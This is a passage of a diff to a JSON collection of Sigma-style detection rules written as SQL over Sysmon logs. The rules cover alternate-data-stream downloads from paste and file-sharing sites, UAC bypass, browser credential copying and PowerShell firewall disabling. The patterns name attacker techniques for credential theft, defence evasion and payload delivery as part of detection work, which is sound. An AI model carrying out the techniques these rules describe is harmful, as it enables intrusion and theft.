'672b13f4a0b6f27d29065123fe882dfc', '6bbd59cea665c4afcc2814c1327ec91f', '725bb81dc24214f6ecacc0cfb36ad30d', '9528a0e91e28fbb88ad433feabca2456', '9da6d5d77be11712527dcab86df449a3', 'a6e01bc1ab89f8d91d9eab72032aae88', 'b24c5eddaea4fe50c6a96a2a133521e4', 'd21bbc50dcc169d7b4d0f01962793154', 'fcc251cceae90d22c392215cc9a2d5d6', '23867a89c2b8fc733be6cf5ef902f2d1', 'a37ff327f8d48e8a4d2f757e1b6e70bc', 'f9a28c458284584a93b14216308d31bd', '6118619783fc175bc7ebecff0769b46e', '959a83047e80ab68b368fdb3f4c6e4ea', '563233bfa169acc7892451f71ad5850a', '87575cb7a0e0700eb37f2e3668671a08', '13f08707f759af6003837a150a371ba1', '1781f06048a7e58b323f0b9259be798b', '233f85f2d4bc9d6521a6caae11a1e7f5', '24af2584cbf4d60bbe5c6d1b31b3be6d', '632969ddf6dbf4e0f53424b75e4b91f2', '713c29b396b907ed71a72482759ed757', '749a7bb1f0b4c4455949c0b2bf7f9e9f', '8628b2608957a6b0c6330ac3de28ce2e', '8b114550386e31895dfab371e741123d', '94cb940a1a6b65bed4d5a8f849ce9793', '9d68781980370e00e0bd939ee5e6c141', 'b18a1401ff8f444056d29450fbc0a6ce', 'cb567f9498452721d77a451374955f5f', '730073214094cd328547bf1f72289752', '17b461a082950fc6332228572138b80c', 'dc25ee78e2ef4d36faa0badf1e7461c9', '819b19d53ca6736448f9325a85736792', '829da329ce140d873b4a8bde2cbfaa7e', 'c547f2e66061a8dffb6f5a3ff63c0a74', '0588081ab0e63ba785938467e1b10cca', '0d9ec08bac6c07d9987dfd0f1506587c', 'bc129092b71c89b4d4c8cdf8ea590b29', '4da924cf622d039d58bce71cdf05d242', 'e7a3a5c377e2d29324093377d7db1c66', '9a9dbec5c62f0380b4fa5fd31deffedf', 'af8a3976ad71e5d5fdfb67ddb8dadfce', '0c477898bbf137bbd6f2a54e3b805ff4', '0ca9f02b537bcea20d4ea5eb1a9fe338', '3ab3655e5a14d4eefc547f4781bf7f9e', 'e6f9d5152da699934b30daab206471f6', '3ad59991ccf1d67339b319b15a41b35d', 'ffdd59e0318b85a3e480874d9796d872', '0cf479628d7cc1ea25ec7998a92f5051', '07a2d4dcbd6cb2c6a45e6b101f0b6d51', 'd6d0f80386e1380d05cb78e871bc72b1', '38d9e015591bbfd4929e0d0f47fa0055', '0e2216679ca6e1094d63322e3412d650', 'ada161bf41b8e5e9132858cb54cab5fb', '2a1bc4913cd5ecb0434df07cb675b798', '11083e75553baae21dc89ce8f9a195e4', 'a23d29c9e566f2fa8ffbb79267f5df80', '4a07f944a83e8a7c2525efa35dd30e2f', '767637c23bb42cd5d7397cf58b0be688', '14c4e4c72ba075e9069ee67f39188ad8', '3c782813d4afce07bbfc5a9772acdbdc', '7d010c6bb6a3726f327f7e239166d127', '89159ba4dd04e4ce5559f132a9964eb3', '6f33f4a5fc42b8cec7314947bd13f30f', '5834ed4291bdeb928270428ebbaf7604', '5a8a8a43f25485e7ee1b201edcbc7a38', 'dc7d30b90b2d8abf664fbed2b1b59894', '41923ea1f824fe63ea5beb84db7a3e74', '3de09703c8e79ed2ca3f01074719906b', 'a53a02b997935fd8eedcb5f7abab9b9f', 'e96a73c7bf33a464c510ede582318bf2', '32089b8851bbf8bc2d014e9f37288c83', '09D278F9DE118EF09163C6140255C690', '03866661686829d806989e2fc5a72606', 'e57401fbdadcd4571ff385ab82bd5d6d', '84B763C45C0E4A3E7CA5548C710DB4EE', '19584675d94829987952432e018d5056', '330768a4f172e10acb6287b87289d83b', '885c99ccfbe77d1cbfcb9c4e7c1a3313', '22a22bc9e4e0d2f189f1ea01748816ac', '7fa30e6bb7e8e8a69155636e50bf1b28') OR (Hash LIKE '%IMPHASH=BCCA3C247B619DCD13C8CDFF5F123932%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=3A19059BD7688CB88E70005F18EFC439%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=bf6223a49e45d99094406777eb6004ba%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=0C106686A31BFE2BA931AE1CF6E9DBC6%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=0D1447D4B3259B3C2A1D4CFB7ECE13C3%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=1B0369A1E06271833F78FFA70FFB4EAF%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=4C1B52A19748428E51B14C278D0F58E3%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=4D927A711F77D62CEBD4F322CB57EC6F%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=66EE036DF5FC1004D9ED5E9A94A1086A%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=672B13F4A0B6F27D29065123FE882DFC%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=6BBD59CEA665C4AFCC2814C1327EC91F%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=725BB81DC24214F6ECACC0CFB36AD30D%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=9528A0E91E28FBB88AD433FEABCA2456%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=9DA6D5D77BE11712527DCAB86DF449A3%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=A6E01BC1AB89F8D91D9EAB72032AAE88%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=B24C5EDDAEA4FE50C6A96A2A133521E4%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=D21BBC50DCC169D7B4D0F01962793154%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=FCC251CCEAE90D22C392215CC9A2D5D6%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=23867A89C2B8FC733BE6CF5EF902F2D1%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=A37FF327F8D48E8A4D2F757E1B6E70BC%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=F9A28C458284584A93B14216308D31BD%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=6118619783FC175BC7EBECFF0769B46E%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=959A83047E80AB68B368FDB3F4C6E4EA%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=563233BFA169ACC7892451F71AD5850A%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=87575CB7A0E0700EB37F2E3668671A08%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=13F08707F759AF6003837A150A371BA1%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=1781F06048A7E58B323F0B9259BE798B%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=233F85F2D4BC9D6521A6CAAE11A1E7F5%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=24AF2584CBF4D60BBE5C6D1B31B3BE6D%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=632969DDF6DBF4E0F53424B75E4B91F2%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=713C29B396B907ED71A72482759ED757%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=749A7BB1F0B4C4455949C0B2BF7F9E9F%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=8628B2608957A6B0C6330AC3DE28CE2E%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=8B114550386E31895DFAB371E741123D%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=94CB940A1A6B65BED4D5A8F849CE9793%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=9D68781980370E00E0BD939EE5E6C141%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=B18A1401FF8F444056D29450FBC0A6CE%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=CB567F9498452721D77A451374955F5F%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=730073214094CD328547BF1F72289752%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=17B461A082950FC6332228572138B80C%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=DC25EE78E2EF4D36FAA0BADF1E7461C9%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=819B19D53CA6736448F9325A85736792%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=829DA329CE140D873B4A8BDE2CBFAA7E%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=C547F2E66061A8DFFB6F5A3FF63C0A74%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=0588081AB0E63BA785938467E1B10CCA%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=0D9EC08BAC6C07D9987DFD0F1506587C%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=BC129092B71C89B4D4C8CDF8EA590B29%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=4DA924CF622D039D58BCE71CDF05D242%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=E7A3A5C377E2D29324093377D7DB1C66%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=9A9DBEC5C62F0380B4FA5FD31DEFFEDF%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=AF8A3976AD71E5D5FDFB67DDB8DADFCE%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=0C477898BBF137BBD6F2A54E3B805FF4%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=0CA9F02B537BCEA20D4EA5EB1A9FE338%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=3AB3655E5A14D4EEFC547F4781BF7F9E%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=E6F9D5152DA699934B30DAAB206471F6%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=3AD59991CCF1D67339B319B15A41B35D%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=FFDD59E0318B85A3E480874D9796D872%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=0CF479628D7CC1EA25EC7998A92F5051%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=07A2D4DCBD6CB2C6A45E6B101F0B6D51%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=D6D0F80386E1380D05CB78E871BC72B1%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=38D9E015591BBFD4929E0D0F47FA0055%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=0E2216679CA6E1094D63322E3412D650%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=ADA161BF41B8E5E9132858CB54CAB5FB%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=2A1BC4913CD5ECB0434DF07CB675B798%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=11083E75553BAAE21DC89CE8F9A195E4%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=A23D29C9E566F2FA8FFBB79267F5DF80%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=4A07F944A83E8A7C2525EFA35DD30E2F%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=767637C23BB42CD5D7397CF58B0BE688%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=14C4E4C72BA075E9069EE67F39188AD8%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=3C782813D4AFCE07BBFC5A9772ACDBDC%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=7D010C6BB6A3726F327F7E239166D127%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=89159BA4DD04E4CE5559F132A9964EB3%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=6F33F4A5FC42B8CEC7314947BD13F30F%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=5834ED4291BDEB928270428EBBAF7604%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=5A8A8A43F25485E7EE1B201EDCBC7A38%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=DC7D30B90B2D8ABF664FBED2B1B59894%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=41923EA1F824FE63EA5BEB84DB7A3E74%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=3DE09703C8E79ED2CA3F01074719906B%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=A53A02B997935FD8EEDCB5F7ABAB9B9F%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=E96A73C7BF33A464C510EDE582318BF2%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=32089B8851BBF8BC2D014E9F37288C83%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=09D278F9DE118EF09163C6140255C690%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=03866661686829d806989e2fc5a72606%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=e57401fbdadcd4571ff385ab82bd5d6d%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=84B763C45C0E4A3E7CA5548C710DB4EE%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=19584675D94829987952432E018D5056%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=330768A4F172E10ACB6287B87289D83B%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=885C99CCFBE77D1CBFCB9C4E7C1A3313%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=22A22BC9E4E0D2F189F1EA01748816AC%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=7FA30E6BB7E8E8A69155636E50BF1B28%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_uac_bypass_icmluautil.yml" + "filename": "create_stream_hash_hacktool_download.yml" }, { - "title": "Suspicious Service Path Modification", - "id": "138d3531-8793-4f50-a2cd-f291b2863d78", - "status": "test", - "description": "Detects service path modification via the \"sc\" binary to a suspicious command or path", - "author": "Victor Sergeev, oscd.community, Nasreddine Bencherchali (Nextron Systems)", + "title": "Creation Of a Suspicious ADS File Outside a Browser Download", + "id": "573df571-a223-43bc-846e-3f98da481eca", + "status": "experimental", + "description": "Detects the creation of a suspicious ADS (Alternate Data Stream) file by software other than browsers", + "author": "frack113", "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "attack.t1543.003" + "attack.defense_evasion" ], "falsepositives": [ - "Unlikely" + "Other legitimate browsers not currently included in the filter (please add them)", + "Legitimate downloads via scripting or command-line tools (Investigate to determine if it's legitimate)" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\sc.exe' ESCAPE '\\' AND CommandLine LIKE '%config%' ESCAPE '\\' AND CommandLine LIKE '%binPath%' ESCAPE '\\' AND (CommandLine LIKE '%powershell%' ESCAPE '\\' OR CommandLine LIKE '%cmd %' ESCAPE '\\' OR CommandLine LIKE '%mshta%' ESCAPE '\\' OR CommandLine LIKE '%wscript%' ESCAPE '\\' OR CommandLine LIKE '%cscript%' ESCAPE '\\' OR CommandLine LIKE '%rundll32%' ESCAPE '\\' OR CommandLine LIKE '%svchost%' ESCAPE '\\' OR CommandLine LIKE '%dllhost%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /c%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /k%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /r%' ESCAPE '\\' OR CommandLine LIKE '%cmd /c%' ESCAPE '\\' OR CommandLine LIKE '%cmd /k%' ESCAPE '\\' OR CommandLine LIKE '%cmd /r%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\TEMP\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '15' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Contents LIKE '[ZoneTransfer] ZoneId=3%' ESCAPE '\\' AND TargetFilename LIKE '%:Zone.Identifier' ESCAPE '\\' AND (TargetFilename LIKE '%.exe%' ESCAPE '\\' OR TargetFilename LIKE '%.scr%' ESCAPE '\\' OR TargetFilename LIKE '%.bat%' ESCAPE '\\' OR TargetFilename LIKE '%.cmd%' ESCAPE '\\' OR TargetFilename LIKE '%.docx%' ESCAPE '\\' OR TargetFilename LIKE '%.hta%' ESCAPE '\\' OR TargetFilename LIKE '%.jse%' ESCAPE '\\' OR TargetFilename LIKE '%.lnk%' ESCAPE '\\' OR TargetFilename LIKE '%.pptx%' ESCAPE '\\' OR TargetFilename LIKE '%.ps%' ESCAPE '\\' OR TargetFilename LIKE '%.reg%' ESCAPE '\\' OR TargetFilename LIKE '%.sct%' ESCAPE '\\' OR TargetFilename LIKE '%.vb%' ESCAPE '\\' OR TargetFilename LIKE '%.wsc%' ESCAPE '\\' OR TargetFilename LIKE '%.wsf%' ESCAPE '\\' OR TargetFilename LIKE '%.xlsx%' ESCAPE '\\')) AND NOT ((Image LIKE '%\\\\brave.exe' ESCAPE '\\') OR ((Image LIKE 'C:\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe' ESCAPE '\\')) OR ((Image LIKE 'C:\\\\Program Files\\\\Mozilla Firefox\\\\firefox.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\Mozilla Firefox\\\\firefox.exe' ESCAPE '\\')) OR ((Image LIKE 'C:\\\\Program Files (x86)\\\\Internet Explorer\\\\iexplore.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\Internet Explorer\\\\iexplore.exe' ESCAPE '\\')) OR (Image LIKE '%\\\\maxthon.exe' ESCAPE '\\') OR (Image LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\EdgeWebView\\\\Application\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\WindowsApps\\\\MicrosoftEdge.exe' ESCAPE '\\' OR (Image LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\Edge\\\\Application\\\\msedge.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\Microsoft\\\\Edge\\\\Application\\\\msedge.exe' ESCAPE '\\')) OR ((Image LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\EdgeCore\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\Microsoft\\\\EdgeCore\\\\%' ESCAPE '\\') AND (Image LIKE '%\\\\msedge.exe' ESCAPE '\\' OR Image LIKE '%\\\\msedgewebview2.exe' ESCAPE '\\')) OR (Image LIKE '%\\\\opera.exe' ESCAPE '\\') OR (Image LIKE '%\\\\safari.exe' ESCAPE '\\') OR (Image LIKE '%\\\\seamonkey.exe' ESCAPE '\\') OR (Image LIKE '%\\\\vivaldi.exe' ESCAPE '\\') OR (Image LIKE '%\\\\whale.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_sc_service_path_modification.yml" + "filename": "create_stream_hash_creation_internet_file.yml" }, { - "title": "Potential Browser Data Stealing", - "id": "47147b5b-9e17-4d76-b8d2-7bac24c5ce1b", + "title": "Potential Suspicious Winget Package Installation", + "id": "a3f5c081-e75b-43a0-9f5b-51f26fe5dba2", "status": "experimental", - "description": "Adversaries may acquire credentials from web browsers by reading files specific to the target browser.\nWeb browsers commonly save credentials such as website usernames and passwords so that they do not need to be entered manually in the future.\nWeb browsers typically store the credentials in an encrypted format within a credential store.\n", + "description": "Detects potential suspicious winget package installation from a suspicious source.", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1555.003" + "attack.defense_evasion", + "attack.persistence" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%copy-item%' ESCAPE '\\' OR CommandLine LIKE '%copy %' ESCAPE '\\' OR CommandLine LIKE '%cpi %' ESCAPE '\\' OR CommandLine LIKE '% cp %' ESCAPE '\\' OR CommandLine LIKE '%move %' ESCAPE '\\' OR CommandLine LIKE '%move-item%' ESCAPE '\\' OR CommandLine LIKE '% mi %' ESCAPE '\\' OR CommandLine LIKE '% mv %' ESCAPE '\\') OR (Image LIKE '%\\\\xcopy.exe' ESCAPE '\\' OR Image LIKE '%\\\\robocopy.exe' ESCAPE '\\') OR OriginalFileName IN ('XCOPY.EXE', 'robocopy.exe')) AND (CommandLine LIKE '%\\\\Opera Software\\\\Opera Stable\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Mozilla\\\\Firefox\\\\Profiles%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Microsoft\\\\Edge\\\\User Data\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Google\\\\Chrome\\\\User Data\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '15' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Contents LIKE '[ZoneTransfer] ZoneId=3%' ESCAPE '\\' AND (Contents LIKE '%://1%' ESCAPE '\\' OR Contents LIKE '%://2%' ESCAPE '\\' OR Contents LIKE '%://3%' ESCAPE '\\' OR Contents LIKE '%://4%' ESCAPE '\\' OR Contents LIKE '%://5%' ESCAPE '\\' OR Contents LIKE '%://6%' ESCAPE '\\' OR Contents LIKE '%://7%' ESCAPE '\\' OR Contents LIKE '%://8%' ESCAPE '\\' OR Contents LIKE '%://9%' ESCAPE '\\') AND TargetFilename LIKE '%:Zone.Identifier' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\WinGet\\\\%' ESCAPE '\\')" ], - "filename": "proc_creation_win_susp_copy_browser_data.yml" + "filename": "create_stream_hash_winget_susp_package_source.yml" }, { - "title": "Windows Firewall Disabled via PowerShell", - "id": "12f6b752-042d-483e-bf9c-915a6d06ad75", + "title": "Suspicious File Download From File Sharing Websites", + "id": "52182dfb-afb7-41db-b4bc-5336cb29b464", "status": "experimental", - "description": "Detects attempts to disable the Windows Firewall using PowerShell", - "author": "Tim Rauch", + "description": "Detects the download of suspicious file type from a well-known file and paste sharing domain", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1562" + "attack.s0139", + "attack.t1564.004" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell\\_ise.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND (CommandLine LIKE '%Set-NetFirewallProfile %' ESCAPE '\\' AND CommandLine LIKE '% -Enabled %' ESCAPE '\\' AND CommandLine LIKE '% False%' ESCAPE '\\') AND (CommandLine LIKE '% -All %' ESCAPE '\\' OR CommandLine LIKE '%Public%' ESCAPE '\\' OR CommandLine LIKE '%Domain%' ESCAPE '\\' OR CommandLine LIKE '%Private%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '15' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Contents LIKE '%https://transfer.sh/%' ESCAPE '\\' OR Contents LIKE '%raw.githubusercontent.com%' ESCAPE '\\' OR Contents LIKE '%gist.githubusercontent.com%' ESCAPE '\\' OR Contents LIKE '%pastebin.com%' ESCAPE '\\' OR Contents LIKE '%cdn.discordapp.com/attachments/%' ESCAPE '\\' OR Contents LIKE '%mediafire.com%' ESCAPE '\\' OR Contents LIKE '%mega.nz%' ESCAPE '\\' OR Contents LIKE '%ddns.net%' ESCAPE '\\' OR Contents LIKE '%.paste.ee%' ESCAPE '\\' OR Contents LIKE '%.hastebin.com%' ESCAPE '\\' OR Contents LIKE '%.ghostbin.co/%' ESCAPE '\\' OR Contents LIKE '%ufile.io%' ESCAPE '\\' OR Contents LIKE '%storage.googleapis.com%' ESCAPE '\\' OR Contents LIKE '%anonfiles.com%' ESCAPE '\\' OR Contents LIKE '%send.exploit.in%' ESCAPE '\\' OR Contents LIKE '%privatlab.net%' ESCAPE '\\' OR Contents LIKE '%privatlab.com%' ESCAPE '\\' OR Contents LIKE '%sendspace.com%' ESCAPE '\\' OR Contents LIKE '%pastetext.net%' ESCAPE '\\' OR Contents LIKE '%pastebin.pl%' ESCAPE '\\' OR Contents LIKE '%paste.ee%' ESCAPE '\\') AND (TargetFilename LIKE '%.exe:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.vbs:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.vbe:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.dll:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.one:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.hta:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.lnk:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.xll:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.cpl:Zone%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_powershell_disable_firewall.yml" + "filename": "create_stream_hash_file_sharing_domains_download_susp_extension.yml" }, { - "title": "Code Execution via Pcwutl.dll", - "id": "9386d78a-7207-4048-9c9f-a93a7c2d1c05", + "title": "Exports Registry Key To an Alternate Data Stream", + "id": "0d7a9363-af70-4e7b-a3b7-1a176b7fbe84", "status": "test", - "description": "Detects launch of executable by calling the LaunchApplication function from pcwutl.dll library.", - "author": "Julia Fomina, oscd.community", + "description": "Exports the target Registry key and hides it in the specified alternate data stream.", + "author": "Oddvar Moe, Sander Wiebing, oscd.community", "tags": [ "attack.defense_evasion", - "attack.t1218.011" + "attack.t1564.004" ], "falsepositives": [ - "Use of Program Compatibility Troubleshooter Helper" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND (CommandLine LIKE '%pcwutl%' ESCAPE '\\' AND CommandLine LIKE '%LaunchApplication%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '15' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\regedit.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_lolbin_pcwutl.yml" + "filename": "create_stream_hash_regedit_export_to_ads.yml" }, { - "title": "Suspicious Splwow64 Without Params", - "id": "1f1a8509-2cbb-44f5-8751-8e1571518ce2", - "status": "test", - "description": "Detects suspicious Splwow64.exe process without any command line parameters", + "title": "Unusual File Download From File Sharing Websites", + "id": "ae02ed70-11aa-4a22-b397-c0d0e8f6ea99", + "status": "experimental", + "description": "Detects the download of suspicious file type from a well-known file and paste sharing domain", "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1202" + "attack.s0139", + "attack.t1564.004" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\splwow64.exe' ESCAPE '\\' AND CommandLine LIKE '%splwow64.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '15' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Contents LIKE '%transfer.sh%' ESCAPE '\\' OR Contents LIKE '%raw.githubusercontent.com%' ESCAPE '\\' OR Contents LIKE '%gist.githubusercontent.com%' ESCAPE '\\' OR Contents LIKE '%pastebin.com%' ESCAPE '\\' OR Contents LIKE '%cdn.discordapp.com/attachments/%' ESCAPE '\\' OR Contents LIKE '%mediafire.com%' ESCAPE '\\' OR Contents LIKE '%mega.nz%' ESCAPE '\\' OR Contents LIKE '%ddns.net%' ESCAPE '\\' OR Contents LIKE '%.paste.ee%' ESCAPE '\\' OR Contents LIKE '%.hastebin.com%' ESCAPE '\\' OR Contents LIKE '%.ghostbin.co/%' ESCAPE '\\' OR Contents LIKE '%ufile.io%' ESCAPE '\\' OR Contents LIKE '%storage.googleapis.com%' ESCAPE '\\' OR Contents LIKE '%anonfiles.com%' ESCAPE '\\' OR Contents LIKE '%send.exploit.in%' ESCAPE '\\' OR Contents LIKE '%privatlab.net%' ESCAPE '\\' OR Contents LIKE '%privatlab.com%' ESCAPE '\\' OR Contents LIKE '%sendspace.com%' ESCAPE '\\' OR Contents LIKE '%pastetext.net%' ESCAPE '\\' OR Contents LIKE '%pastebin.pl%' ESCAPE '\\' OR Contents LIKE '%paste.ee%' ESCAPE '\\') AND (TargetFilename LIKE '%.ps1:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.bat:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.cmd:Zone%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_splwow64_cli_anomaly.yml" + "filename": "create_stream_hash_file_sharing_domains_download_unusual_extension.yml" }, { - "title": "SOURGUM Actor Behaviours", - "id": "7ba08e95-1e0b-40cd-9db5-b980555e42fd", - "status": "test", - "description": "Suspicious behaviours related to an actor tracked by Microsoft as SOURGUM", - "author": "MSTIC, FPT.EagleEye", + "title": "Unusual File Download from Direct IP Address", + "id": "025bd229-fd1f-4fdb-97ab-20006e1a5368", + "status": "experimental", + "description": "Detects the download of suspicious file type from URLs with IP", + "author": "Nasreddine Bencherchali (Nextron Systems), Florian Roth (Nextron Systems)", "tags": [ - "attack.t1546", - "attack.t1546.015", - "attack.persistence", - "attack.privilege_escalation" + "attack.defense_evasion", + "attack.t1564.004" ], "falsepositives": [ "Unknown" ], 